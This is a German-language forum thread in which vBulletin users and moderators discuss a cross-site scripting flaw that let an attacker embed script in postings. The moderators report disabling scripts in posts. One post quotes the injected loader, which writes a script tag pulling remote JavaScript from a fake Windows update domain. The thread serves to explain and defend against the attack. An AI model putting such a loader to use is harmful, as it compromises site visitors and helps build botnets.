ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
Advanced Member
ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
Advanced Member
Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings einZitat von Firefighter Heiti
benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hierCode:{script} Hier Schadcode nach wahl {/script}
EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht
Advanced Member
achso...
ich dachte auch das die software sowas filtert....
naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?
Moderator
Sie filterts nicht, weil sie's nicht erkennt, ob es was Schadhaftes ist oder solche netten Hinweis-Boxen wie wir Mods sie gerne verwenden.
Ist aber nun alles deaktiviert.
Advanced Member
achso:)
kann man das nicht filtern? also das nur moderatoren scripte nutzen dürfen?
Moderator
Daran wird derzeit gerade gearbeitet :)
Backdraft ist schon dran!
Advanced Member
achso:)
gut dann hör ich auf mit nerven:D
Advanced Member
Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:
XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'>")
Advanced Member
Ein BOT-Netz aufbauen :)
hier wird der gute Glaube und der Up-to-date Sinn der Internetnutzer ausgenutzt.
Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
Berechtigungen
Zitieren